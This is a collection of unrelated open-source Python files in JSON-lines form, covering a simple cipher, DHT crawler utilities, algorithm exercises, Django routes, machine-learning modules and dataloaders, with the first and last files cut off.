math.ceil(math.sqrt(len(alphabet)))\n for i in range(max_square):\n for j in range(max_square):\n index = i * max_square + j\n if (index >= len(alphabet)):\n break\n coded[alphabet[index]] = str(i) + str(j)\n decoded[str(i) + str(j)] = alphabet[index]\n\n\ndef encode_file(filename):\n f = open(filename, 'r', encoding='utf-8')\n # fw = open(\"task4_res.txt\", 'w', encoding='utf-8')\n answer = \"\"\n for row in f:\n for symbol in row:\n if (symbol == '\\n'):\n continue\n answer = answer + coded[symbol] + ' '\n answer = answer + '\\n'\n return answer\n\n\ndef decode_file(filename):\n f = open(filename, 'r', encoding='utf-8')\n # fw = open(\"task4_res.txt\", 'w', encoding='utf-8')\n answer = \"\"\n for row in f:\n for numbers in row.split():\n if (numbers == '\\n'):\n continue\n answer = answer + decoded[numbers]\n answer = answer + '\\n'\n return answer\n\n\ncreate_alphabet()\nprint(encode_file(\"task4.txt\"))\nprint(decode_file(\"task4_en.txt\"))\n","repo_name":"Alexflames/water","sub_path":"protection/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27114522893","text":"__author__ = 'dwb'\n\n\nimport logging\nimport logging.handlers\nfrom hashlib import sha1\nfrom random import randint\nfrom struct import unpack, pack\nfrom socket import inet_aton, inet_ntoa\nfrom threading import Timer, Thread\n\nstdger = logging.getLogger(\"std_log\")\nfileger = logging.getLogger(\"file_log\")\n\ndef initialLog():\n\n stdLogLevel = logging.DEBUG\n fileLogLevel = logging.DEBUG\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n stdout_handler = logging.StreamHandler()\n stdout_handler.setFormatter(formatter)\n\n file_handler = logging.handlers.RotatingFileHandler(\"HASH.log\", maxBytes=1024*1024*20, backupCount=10000)\n file_handler.setFormatter(formatter)\n\n peer_handler = 
logging.handlers.RotatingFileHandler(\"PEER.log\", maxBytes=1024*1024*20, backupCount=10000)\n peer_handler.setFormatter(formatter)\n\n logging.getLogger(\"file_log\").setLevel(fileLogLevel)\n logging.getLogger(\"file_log\").addHandler(file_handler)\n\n logging.getLogger(\"std_log\").setLevel(stdLogLevel)\n logging.getLogger(\"std_log\").addHandler(stdout_handler)\n\n logging.getLogger(\"peer_log\").setLevel(fileLogLevel)\n logging.getLogger(\"peer_log\").addHandler(peer_handler)\n\n\ndef entropy(length):\n chars = []\n for i in range(length):\n chars.append(chr(randint(0, 255)))\n return \"\".join(chars)\n\ndef random_id():\n hash = sha1()\n hash.update(entropy(20))\n return hash.digest()\n\ndef decode_nodes(nodes):\n n = []\n length = len(nodes)\n if (length % 26) != 0:\n return n\n\n for i in range(0, length, 26):\n nid = nodes[i:i+20]\n ip = inet_ntoa(nodes[i+20:i+24])\n port = unpack(\"!H\", nodes[i+24:i+26])[0]\n n.append((nid, ip, port))\n return n\n\ndef decode_values(values):\n\n n=[]\n for i in values:\n\n stdger.debug(\"the length of value %d\"%len(i))\n if len(i)!=6:\n continue\n ip = inet_ntoa(i[0:4])\n port = unpack(\"!H\", i[4:6])[0]\n n.append((ip,port))\n return n\n\ndef timer(t, f):\n Timer(t, f).start()\n\ndef get_neighbor(target, end=10):\n\n return target[:end]+random_id()[end:]","repo_name":"NanYoMy/GetInfo","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"11679168311","text":"# O(n^2) time | O(n) space\ndef threeNumberSum(array, targetSum):\n # Sort array\n array.sort()\n\n output = []\n\n for i in range(len(array)):\n print(\"Loop: \", i)\n current = array[i]\n left = i+1\n right = len(array) - 1\n\n if current >= targetSum:\n break\n\n while left < right:\n currentSum = current + array[left] + array[right]\n\n if currentSum > targetSum:\n print(\"Greater\")\n right -= 1\n print(\"right: \", right)\n elif currentSum < targetSum:\n print(\"Less\")\n left += 1\n print(\"left: \", left)\n else:\n print(\"3\")\n output.append([current, array[left], array[right]])\n right -= 1\n left += 1\n\n return output\n","repo_name":"kawaharm/algoexpert","sub_path":"array/threeNumberSum.py","file_name":"threeNumberSum.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20095013545","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModule for storing basic data structures of mock data for testing.\n\"\"\"\nmock_customer_data = {\n \"id\": \"1b2f7b83-7b4d-441d-a210-afaa970e5b76\",\n \"data\": {\n \"SUBSCRIPTION\": \"basic\",\n \"CREATION_DATE\": \"2013-03-10T02:00:00Z\",\n \"LAST_PAYMENT_DATE\": \"2020-01-10T09:25:00Z\",\n \"theme_name\": \"Tropical Island\",\n \"ENABLED_FEATURES\": {\n \"CERTIFICATES_INSTRUCTOR_GENERATION\": True,\n \"INSTRUCTOR_BACKGROUND_TASKS\": True,\n \"ENABLE_COURSEWARE_SEARCH\": True,\n \"ENABLE_COURSE_DISCOVERY\": True,\n \"ENABLE_DASHBOARD_SEARCH\": True,\n \"ENABLE_EDXNOTES\": True,\n },\n \"language_code\": \"en\",\n \"banner_message\": \"
Welcome to Mr X's website
\",\n \"displayed_timezone\": \"America/Bogota\",\n \"user_profile_image\": \"https://i.imgur.com/LMhM8nn.jpg\",\n \"user_email\": \"barack@aol.com\",\n },\n}\n\nmock_manager_arguments = {\n \"new_subscription\": \"basic\",\n \"customer_id\": \"9f5c5a5f-4f4c-4a4c-a5f5-5c5f9f4f4c4a\",\n \"customer_data_api_url\": \"http://localhost:8010/api/v1/customerdata/\",\n \"subscriptions\": {\"free\": 1, \"basic\": 2, \"premium\": 3},\n}\n\nsubscription_levels = {\n \"low_subscription\": 1,\n \"mid_subscription\": 2,\n \"high_subscription\": 3,\n}\n\nsubscription_manager_attributes = [\n \"customer_id\",\n \"new_subscription\",\n \"customer_data_api_url\",\n \"subscriptions\",\n \"customer_data\",\n \"old_subscription\",\n \"changes_sent\",\n \"exit_code\",\n]\n","repo_name":"CristianHdz90/subscription_manager","sub_path":"02_your_code/subscription_manager_base/subscription_manager/tests/mocks/mock_data.py","file_name":"mock_data.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18882461155","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('event_category/', views.EventCategoryPage, name='event_category'),\n path('event/', views.EventPage, name='events'),\n path('event_image/', views.EventImagePage, name='event_image'),\n path('event_member/', views.EventMemberPage, name='event_member'),\n \n]","repo_name":"ak21shuklaa/Membership-Management-System","sub_path":"FYP-master/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11550223250","text":"import torch\nimport torch.nn as nn\n\n\nclass CouplingLayer(nn.Module):\n def __init__(self, d, swap=False, w_init_sigma=0.001, intermediate_dim=64):\n nn.Module.__init__(self)\n self.d = d - (d // 2)\n self.swap = swap\n self.net_s_t = nn.Sequential(\n nn.Linear(self.d, intermediate_dim),\n nn.ReLU(inplace=True),\n #nn.BatchNorm1d(intermediate_dim),\n nn.Linear(intermediate_dim, intermediate_dim),\n nn.ReLU(inplace=True),\n nn.BatchNorm1d(intermediate_dim),\n nn.Linear(intermediate_dim, (d - self.d) * 2),\n )\n\n def forward(self, x, logpx=None, reverse=False):\n ''' swap: which part should be operated with; dim has to bee an even number '''\n if self.swap:\n x = torch.cat([x[:, self.d:], x[:, :self.d]], 1)\n\n in_dim = self.d\n out_dim = x.shape[1] - self.d\n epsilon = 1.0E-10\n s_t = self.net_s_t(x[:, :in_dim]) ## size: 2*(x.shape[1] - self.d)\n scale = torch.sigmoid(s_t[:, :out_dim] + 2.) 
+ epsilon\n shift = s_t[:, out_dim:]\n\n ## [batch_size, 1]\n logdetjac = torch.sum(torch.log(scale).view(scale.shape[0], -1), dim=1, keepdim=False)\n\n if not reverse:\n y1 = x[:, self.d:] * scale + shift\n delta_logp = -logdetjac\n else:\n y1 = (x[:, self.d:] - shift) / scale\n delta_logp = logdetjac\n\n y = torch.cat([x[:, :self.d], y1], 1) if not self.swap else torch.cat([y1, x[:, :self.d]], 1)\n if logpx is None:\n return y, None, delta_logp\n else:\n logpx = torch.squeeze(logpx)\n delta_logp = torch.squeeze(delta_logp)\n if torch.cuda.is_available():\n delta_logp = delta_logp.cuda()\n logpx = logpx.cuda()\n else:\n delta_logp = delta_logp\n logpx = logpx\n return y, logpx + delta_logp, delta_logp\n\n","repo_name":"ShaogangRen/EFRE","sub_path":"utils/layers/coupling.py","file_name":"coupling.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12610914277","text":"#!/usr/bin/env python\n\n\"\"\"\nhierarchical.py: module is deddicated to run different hierarchical algorithms.\n\n Hierarchical clustering algorithms [23] were developed to overcome some of the disadvantages\n associated with flat or partitional-based clustering methods. Hierarchical algorithms were \n developed to build a more deterministic and flexible mechanism for clustering the data objects. \n Hierarchical methods can be categorized into agglomerative and divisive clustering methods.\n Agglomerativemethods start by taking singleton clusters (that contain only one data object per \n cluster) at the bottom level and continue merging two clusters at a time to build a bottom-up\n hierarchy of the clusters. Divisive methods, on the other hand, start with all the data objects\n in a huge macro-cluster and split it continuously into two groups generating a top-down\n hierarchy of clusters.\n - agglomerative (here only this algoritm with different linkage function is in operation)\n\"\"\"\n\n__author__ = \"Chakraborty, S.\"\n__copyright__ = \"Copyright 2020, SuperDARN@VT\"\n__credits__ = []\n__license__ = \"MIT\"\n__version__ = \"1.0.\"\n__maintainer__ = \"Chakraborty, S.\"\n__email__ = \"shibaji7@vt.edu\"\n__status__ = \"Research\"\n\n\nimport numpy as np\n\nfrom sklearn.cluster import AgglomerativeClustering, FeatureAgglomeration\n\nclass Hierarchi(object):\n \"\"\"All hierarchical algorithms are implemened here.\"\"\"\n\n def __init__(self, method, data, n_clusters=2, random_state=0):\n \"\"\"\n Initialize all the parameters.\n method: Name of the algorithms (lower case joined by underscore)\n data: Data (2D Matrix)\n n_clusters: Number of clusters\n random_state: Random initial state\n \"\"\"\n self.method = method\n self.data = data\n self.n_clusters = n_clusters\n np.random.seed(random_state)\n\n self.affinity = \"euclidean\"\n self.linkage = \"ward\"\n self.distance_threshold = None\n return\n\n def setup(self, keywords={}):\n \"\"\"\n Setup the algorithms\n \"\"\"\n for p in keywords.keys():\n setattr(self, p, keywords[p])\n\n if self.method == \"agglomerative\": self.obj = AgglomerativeClustering(n_clusters=self.n_clusters, linkage=self.linkage, \n affinity=self.affinity)\n if self.method == \"feature\": self.obj = FeatureAgglomeration(n_clusters=self.n_clusters, linkage=self.linkage,\n affinity=self.affinity, distance_threshold=self.distance_threshold)\n return\n\n def run(self):\n \"\"\"\n Run the models\n \"\"\"\n if self.method == \"agglomerative\": self.obj.fit(self.data)\n if self.method == \"feature\": 
self.obj.fit(self.data)\n return\n","repo_name":"shibaji7/SuperDARN-Clustering","sub_path":"sd/algorithms/hierarchical.py","file_name":"hierarchical.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35688365099","text":"# меню\n# ввод\n# расчет\n# вывод\n\ndef menu():\n # выводим меню програмки\n print('- - - - МЕНЮ - - - -\\n',\n '1. Расчитать з/п сотрудника\\n'\n ' 2. Выход из программы\\n'\n '- - - - ---- - - - -')\n return input('Выберите действие: ')\n\n\ndef entry():\n # собираем данные о сотруднике/сотрудниках\n data = {\n 'Выработка в часах': int(input('Введите объем выработки в часах: ')),\n 'Ставка в час': int(input('Введите ставку в час ($): ')),\n 'Премия в %': int(input('Введите объем премии в процентах: ')),\n 'Кол-во сотрудников': int(input('Введите количество сотрудников: '))\n }\n return data\n\n\ndef my_counter(data):\n # проводим нехитрые калькуляции з/п\n data_list = []\n res = 1\n for el in data.values():\n data_list.append(el)\n if data_list[0] < 140:\n print('Премия не начилена')\n data_list.pop(2)\n else:\n data_list[2] = (data_list[2] / 100) + 1\n for el in data_list:\n res *= el\n res = float('{:.3f}'.format(res))\n return res\n\n\ndef results(data, res, num):\n # выводим результаты\n print('Ваши данные: \\n'\n f'{data}')\n print('Результат рассчета: \\n'\n f'${res} на {num} сотрудника/сотрудников')\n\n\ndef main():\n # заставляем все работать в команде\n choice = 0\n while True:\n choice = int(menu())\n if choice == 1:\n data = entry()\n result = my_counter(data)\n num = data.setdefault('Кол-во сотрудников')\n results(data, result, num)\n elif choice == 2:\n print('Программа завершена')\n break\n else:\n print('Выберите действие: ')\n\n\nmain()\n","repo_name":"yuriyhryshman/gb_python","sub_path":"lesson_4/python1.py","file_name":"python1.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8802654474","text":"# 2018-12-08\n\nclass Solution(object):\n def deleteDuplicates(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return head\n \n dummy = pre = ListNode(0)\n dummy.next = head\n \n # we must need this head because \n while head and head.next:\n if head.val != head.next.val:\n pre = pre.next\n head = head.next\n else:\n while head.next and head.val == head.next.val:\n head = head.next\n head = head.next\n pre.next = head\n \n \n return dummy.next","repo_name":"RioAraki/leetcode2020","sub_path":"leetcode_python/82_RemoveDuplicatesfromSortedListII.py","file_name":"82_RemoveDuplicatesfromSortedListII.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29391384544","text":"import cv2\nfrom torch.utils.data import Dataset\nfrom tools.mots_tools.io import *\nimport torch\nfrom roi_align import RoIAlign\nimport torchvision\nimport matplotlib.pyplot as plt\nfrom torchvision import transforms\nimport random\n\ndef format_box(bbox):\n return torch.Tensor([[bbox[0], bbox[1], bbox[0]+ bbox[2], bbox[1] + bbox[3]]])\n\ndef pass_box(bbox):\n return torch.Tensor([bbox[0], bbox[1], bbox[2], bbox[3]])\n\nclass BackboneDataset(Dataset):\n def __init__(self, inputRes=None,\n # seqs_list_file='/home/zuochenyu/datasets/MOTSChallenge/train/instances_txt',\n seqs_list_file=r'E:\\Challenge\\MOTSChallenge\\train\\instances_txt',\n 
img_file_root=r'E:\\Challenge\\MOTSChallenge\\train\\images',\n # img_file_root='/home/zuochenyu/datasets/MOTSChallenge/train/images',\n transform=None,\n random_rev_thred=0.4,level=3):\n\n # self.imgPath = os.path.join(, \"{:04}\".format(sequence))\n self.transform = transform\n self.inputRes = inputRes\n self.random_rev_thred = random_rev_thred\n self.tr_image = transforms.Compose([transforms.ToTensor()])\n self.level = level\n\n self.img_list = []\n\n for sequence in [2,5,9,11]:\n imgPath = os.path.join(img_file_root, \"{:04}\".format(sequence))\n filename = os.path.join(seqs_list_file, \"{:04}.txt\".format(sequence))\n instance = load_txt(filename)\n for i in range(len(instance)):\n frame = i+1\n self.img_list.append((os.path.join(imgPath, \"{:06}.jpg\".format(frame)),instance[frame]))\n random.shuffle(self.img_list)\n\n def __len__(self):\n return len(self.img_list)\n\n def __getitem__(self, idx):\n seed = np.random.randint(2147483647) # make a seed with numpy generator\n instance_per_frame = self.img_list[idx][1]\n img = self.img_list[idx][0]\n img = cv2.imread(img)\n img = cv2.resize(img, (2048, 1024))\n img = Image.fromarray(img.astype('uint8')).convert('RGB')\n # img = img[:,:,:].transpose(2, 0, 1)\n # img = np.ascontiguousarray(img, dtype=np.float32)\n # img /= 255.0\n background = np.zeros([1024,2048])\n for obj in instance_per_frame:\n if obj.class_id!=2:\n continue\n mask = rletools.decode(obj.mask)\n mask = cv2.resize(mask, (2048, 1024))\n background[mask>0]=255\n if self.level==0:\n background = cv2.resize(background, (1020, 508))\n elif self.level==1:\n background = cv2.resize(background, (508, 252))\n elif self.level == 2:\n background = cv2.resize(background, (252, 124))\n elif self.level == 3:\n background = cv2.resize(background, (124, 60))\n background = Image.fromarray(background.astype('uint8'))\n\n if self.transform is not None:\n random.seed(seed) # apply this seed to img tranfsorms\n img = self.transform(img)\n img = self.tr_image(img)\n random.seed(seed) # apply this seed to img tranfsorms\n background = self.transform(background)\n background = self.tr_image(background)\n return {\"img\":img,\"mask\":background}","repo_name":"Zachary-Zuo/Multi-Object-Tracking-and-Segmentation-with-Pytorch","sub_path":"dataloaders/backbone_dataloader.py","file_name":"backbone_dataloader.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"34652973516","text":" \nfrom Aplicaciones.Agenda.models import Guardia\n\n@shared_task \ndef guardia_ranking_update():\n\n print(\"PROBANDO CELERY BEATS \"*20)\n guardias = Guardia.objects.filter(disponible=True)\n for guardia in guardias:\n if guardia.min_ranking < 200:\n guardia.min_ranking =+ 1\n guardia.save() \n\n","repo_name":"Alduxsan/AgendaGuardiasMedicas","sub_path":"api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1059317315","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nimport copy\n\n\ndef clones(module, N):\n \"Produce N identical layers.\"\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\n\nclass AttentionNet(nn.Module):\n \"Construct attention module\"\n\n def __init__(self, layer, N):\n super(AttentionNet, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n\n def forward(self, domainslots, 
context, delex_context):\n out = None\n for layer in self.layers:\n out = layer(domainslots, context, delex_context)\n return self.norm(out)\n\n\nclass LayerNorm(nn.Module):\n \"Construct a layernorm module\"\n\n def __init__(self, features, eps=1e-6):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(features))\n self.b_2 = nn.Parameter(torch.zeros(features))\n self.eps = eps\n\n def forward(self, x):\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\nclass SublayerConnection(nn.Module):\n \"A residual connection followed by a layer norm.\"\n\n def __init__(self, size, dropout):\n super(SublayerConnection, self).__init__()\n self.norm = LayerNorm(size)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, sublayer):\n \"Apply residual connection to any sublayer with the same size.\"\n return x + self.dropout(sublayer(self.norm(x)))\n\n def expand_forward(self, x, sublayer):\n out = self.dropout(sublayer(self.norm(x)))\n out = out.mean(1).unsqueeze(1).expand_as(x)\n return x + out\n\n def nosum_forward(self, x, sublayer):\n return self.dropout(sublayer(self.norm(x)))\n\n\nclass SubLayer(nn.Module):\n def __init__(self, size, attn, feedforward, dropout, nb_attn):\n super(SubLayer, self).__init__()\n self.attn = attn\n self.feedforward = feedforward\n self.size = size\n self.attn = clones(attn, nb_attn)\n self.sublayer = clones(SublayerConnection(size, dropout), nb_attn+1)\n\n def forward(self, seq1, seq2, seq3):\n out = self.sublayer[0](\n seq1, lambda seq1: self.attn[0](seq1, seq1, seq1))\n #print(\"out size::\" + str(out.size()))\n out = self.sublayer[1](out, lambda out: self.attn[1](out, seq2, seq2))\n out = self.sublayer[2](out, lambda out: self.attn[2](out, seq3, seq3))\n return self.sublayer[3](out, self.feedforward)\n\n\ndef attention(query, key, value, mask=None, dropout=None):\n \"Compute 'Scaled Dot Product Attention'\"\n d_k = query.size(-1)\n scores = torch.matmul(query, key.transpose(-2, -1)) \\\n / math.sqrt(d_k)\n if mask is not None:\n scores = scores.masked_fill(mask == 0, -1e9)\n p_attn = F.softmax(scores, dim=-1)\n if dropout is not None:\n p_attn = dropout(p_attn)\n return torch.matmul(p_attn, value), p_attn\n\n\nclass MultiHeadedAttention(nn.Module):\n def __init__(self, h, d_model, d_in=-1, dropout=0.1):\n \"Take in model size and number of heads.\"\n super(MultiHeadedAttention, self).__init__()\n assert d_model % h == 0\n # We assume d_v always equals d_k\n self.d_k = d_model // h\n self.h = h\n if d_in < 0:\n d_in = d_model\n self.linears = clones(nn.Linear(d_in, d_model), 3)\n self.linears.append(nn.Linear(d_model, d_in))\n self.attn = None\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, query, key, value, mask=None):\n if mask is not None:\n # Same mask applied to all h heads.\n mask = mask.unsqueeze(1)\n nbatches = query.size(0)\n\n # 1) Do all the linear projections in batch from d_model => h x d_k\n query, key, value = \\\n [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n for l, x in zip(self.linears, (query, key, value))]\n\n # 2) Apply attention on all the projected vectors in batch.\n x, self.attn = attention(query, key, value, mask=mask,\n dropout=self.dropout)\n\n # 3) \"Concat\" using a view and apply a final linear.\n x = x.transpose(1, 2).contiguous() \\\n .view(nbatches, -1, self.h * self.d_k)\n return 
self.linears[-1](x)\n","repo_name":"maxVeremchuk/univ1Mag","sub_path":"coursework/model/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"74063835291","text":"import os;\nimport sys;\n\ndef edit_distance(s1, s2):\n if (len(s1) < len(s2)):\n return edit_distance(s2, s1);\n if (len(s2) == 0):\n return len(s1);\n previous_row = range(len(s2) + 1);\n for i, c1 in enumerate(s1):\n current_row = [i + 1];\n for j, c2 in enumerate(s2):\n insertions = previous_row[j + 1] + 1;\n deletions = current_row[j] + 1;\n substitutions = previous_row[j] + (c1 != c2);\n current_row.append(min(insertions, deletions, substitutions));\n previous_row = current_row;\n return previous_row[-1];\n\nclass Dataset:\n def __init__(self, line=''):\n if (line == ''):\n self.reads_path = '';\n self.type = ''; ### nanopore/pacbio/single/paired/mate\n self.frag_len = 0; ### Length of the fragment for paired end reads, insert size for mate pair libraries.\n self.frag_stddev = 0; ### Standard deviation of the above length.\n self.reads_path_a = '';\n self.reads_path_b = '';\n else:\n split_line = line.split(',');\n\n self.type = split_line[0];\n if (self.type == 'paired' or self.type == 'mate'):\n if (len(split_line) < 5):\n sys.stderr.write('ERROR: Five arguments need to be specified: \"reads_type,reads_path_a,reads_path_b,frag_len,frag_stddev\"!\\n');\n return;\n if (os.path.basename(split_line[1]) == ''):\n sys.stderr.write('ERROR: Reads file path not correctly specified! Exiting.\\n');\n exit(1);\n if (os.path.basename(split_line[2]) == ''):\n sys.stderr.write('ERROR: Reads file path not correctly specified! Exiting.\\n');\n exit(1);\n\n self.reads_path_a = os.path.abspath(split_line[1]);\n self.reads_path_b = os.path.abspath(split_line[2]);\n self.frag_len = int(split_line[3]);\n self.frag_stddev = int(split_line[4]);\n\n if (edit_distance(self.reads_path_a, self.reads_path_b) > 1):\n sys.stderr.write('ERROR: Paths to paired-end/mate-pair libraries should differ only in 1 character! Exiting.\\n');\n exit(1);\n # print 'self.reads_path_a = %s' % (self.reads_path_a);\n wildcard_path = list(self.reads_path_a);\n # print wildcard_path;\n # print '';\n d = zip(self.reads_path_a, self.reads_path_b);\n # print d;\n\n current_char = 0;\n for i,j in d:\n if (i != j):\n wildcard_path[current_char] = '?';\n current_char += 1;\n self.reads_path = ''.join(wildcard_path);\n\n # elif (self.type == 'nanopore' or self.type == 'pacbio' or self.type == 'single'):\n else:\n if (len(split_line) < 2):\n sys.stderr.write('ERROR: Two arguments need to be specified: \"reads_type,reads_path\"!\\n');\n return;\n if (os.path.basename(split_line[1]) == ''):\n sys.stderr.write('ERROR: Reads file path not correctly specified! 
Exiting.\\n');\n exit(1);\n self.reads_path = os.path.abspath(split_line[1]);\n\n # else:\n # sys.stderr.write('ERROR: Unknown type of reads specified as parameter: \"%s\"!\\n' % (line));\n # return;\n","repo_name":"kkrizanovic/NanoMark","sub_path":"src/dataspec.py","file_name":"dataspec.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"4225716221","text":"# https://leetcode.com/problems/kth-missing-positive-number/submissions/921489767/\n# Date of Submission: 2023-03-24\n\n# Runtime: 63 ms, faster than 24.4% of Python3 online submissions for Kth Missing Positive Integer.\n# Memory Usage: 14 MB, less than 74.10% of Python3 online submissions for Kth Missing Positive Integer.\n#\n\n# Problem:\n# Given an array arr of positive integers sorted in a strictly increasing order, and an integer k.\n# Return the kth positive integer that is missing from this array.\n\n\nclass Solution:\n def findKthPositive(self, arr: List[int], k: int) -> int:\n\n currVal = 0\n while k > 0:\n currVal+= 1\n if len(arr) == 0:\n k-=1\n elif currVal < arr[0]:\n k-=1\n elif currVal == arr[0]:\n arr=arr[1:]\n return currVal\n","repo_name":"Retroflux/playground","sub_path":"LeetCodeSolutions/Python/1539-Kth_Missing_Positive_Number/memory_optimized_solution.py","file_name":"memory_optimized_solution.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23507509787","text":"import torch\nfrom torch.autograd import Variable\nimport numpy as np\nfrom skimage.io import (imread,\n imsave)\nfrom skimage.transform import resize\n\ndef gkern(l=5, sig=1.):\n \"\"\"\n Creates gaussian kernel with side length l and a sigma of sig.\n Acknowledgement: https://stackoverflow.com/users/6465762/clemisch\n \"\"\"\n ax = np.arange(-l // 2 + 1., l // 2 + 1.)\n xx, yy = np.meshgrid(ax, ax)\n kernel = np.exp(-(xx**2 + yy**2) / (2. * sig**2))\n return kernel / np.sum(kernel)\n\ndef get_fm_for_xy(x,y):\n \"\"\"\n Return a feature map corresponding to a keypt at\n location (x,y).\n \"\"\"\n fm = np.zeros((128,128))\n gauss_len = 8\n gauss_std = 1 # 2 \n #x,y = 64, 64\n kern = gkern(l=gauss_len, sig=gauss_std)\n # The kernel may be bigger than the region\n # of the image it is applied to, so crop it\n # here if necessary.\n xh, xw = fm[y-(gauss_len//2):y+(gauss_len//2),\n x-(gauss_len//2):x+(gauss_len//2)].shape\n kern = kern[0:xh,0:xw]\n fm[y-(gauss_len//2):y+(gauss_len//2),\n x-(gauss_len//2):x+(gauss_len//2)] += kern\n return fm\n\ndef read_kpt_file(filename, sep=\",\"):\n \"\"\"Return np array of keypts\"\"\"\n kpts = open(filename).read().split(\"\\n\")[0:-1]\n kpts = [ elem.split(sep) for elem in kpts ]\n num_cols = len(kpts[0])\n for entry in kpts:\n for i in range(num_cols):\n entry[i] = float(entry[i])\n kpts = np.asarray(kpts)\n return kpts\n\ndef get_data_from_id(root, mode, id_):\n \"\"\"\n Returns:\n - img_downsized: this is the image in 128px res.\n - y_keypts: the keypts in range [0, 1]. 
To plot\n these, multiply by 128., and overlay these on \n img_downsized.\n - z_keypts: the z keypoints normalised.\n \"\"\"\n img = imread(\"%s/%s_img/%s.jpg\" % (root,mode,id_))\n keypts = read_kpt_file(\"%s/%s_lm/%s_lm.csv\" % (root,mode,id_))\n # We want the img + keypts in 128x128px img so preproc them\n # accordingly.\n img_downsized = resize(img, (128,128))\n y_keypts = np.copy(keypts)[:,0:2]\n y_keypts[:,0] = y_keypts[:,0] / float(img.shape[1]) # x's\n y_keypts[:,1] = y_keypts[:,1] / float(img.shape[0]) # y's\n avg_sz = (img.shape[0]+img.shape[1]) / 2.\n z_keypts = keypts[:,2] / avg_sz # what range??\n return img_downsized, y_keypts, z_keypts\n\ndef construct_A(src_kps, src_z_pred):\n K = 66\n bs = src_kps.shape[0]\n # TODO: make more efficient\n A = np.zeros((bs, K*2, 8))\n for b in range(bs):\n c = 0\n for i in range(0, A.shape[1]-1, 2):\n A[b, i, 0] = src_kps[b, 0, c] # xi\n A[b, i, 1] = src_kps[b, 1, c] # yi\n #A[i,2] = z_pred[c] # zi\n A[b, i, -2] = 1.\n #\n A[b, i+1, 3] = src_kps[b, 0, c] # xi\n A[b, i+1, 4] = src_kps[b, 1, c] # yi\n #A[i+1,6] = z_pred[c] # zi\n A[b, i+1, -1] = 1.\n c += 1\n A = torch.from_numpy(A).float()\n if src_z_pred.is_cuda:\n A = A.cuda()\n for b in range(bs):\n c = 0\n for i in range(0, A.size(1)-1, 2):\n A[b, i, 2] = src_z_pred[b, 0, c] # zi\n A[b, i+1, 5] = src_z_pred[b, 0, c] # zi\n c += 1\n return A\n\ndef predict_tgt_kp_pseudoinv(xy_keypt_src,\n pred_src_z,\n xy_keypt_tgt):\n \"\"\"\n Given src keypts, predicted depths, and tgt keypts,\n construct a baseline estimate of the predicted \n tgt keypoints through the pseudo-inverse (fixed m)\n formulation in the paper.\n xy_keypt_src: (bs, 66, 2) in numpy\n pred_src_z: (bs, 1, 66) in Torch\n xy_keypt_tgt: (bs, 66, 2) in numpy\n \"\"\"\n # TODO\n assert xy_keypt_src.shape[0] == 1\n assert xy_keypt_tgt.shape[0] == 1\n # TODO\n A = construct_A(xy_keypt_src.swapaxes(1,2),\n pred_src_z)\n tgt_kps_f = xy_keypt_tgt.swapaxes(1,2).reshape((1, 2*66), order='F')\n xt = torch.from_numpy(tgt_kps_f).float()\n X1 = [torch.inverse(mat) for mat in\n torch.matmul(A.transpose(2, 1), A)]\n X1 = torch.stack(X1)\n X2 = torch.bmm(A.transpose(2, 1), xt.unsqueeze(2))\n m = torch.bmm(X1, X2) # (bs,8,1)\n bs = xy_keypt_src.shape[0]\n m_rshp = torch.cat((m[:, 0:6, :].reshape((bs, 2, 3)),\n m[:, [6, 7], :].reshape((bs, 2, 1))),\n dim=2)\n ones = torch.ones((1, 1, 66)).float()\n xy_keypt_src_torch = 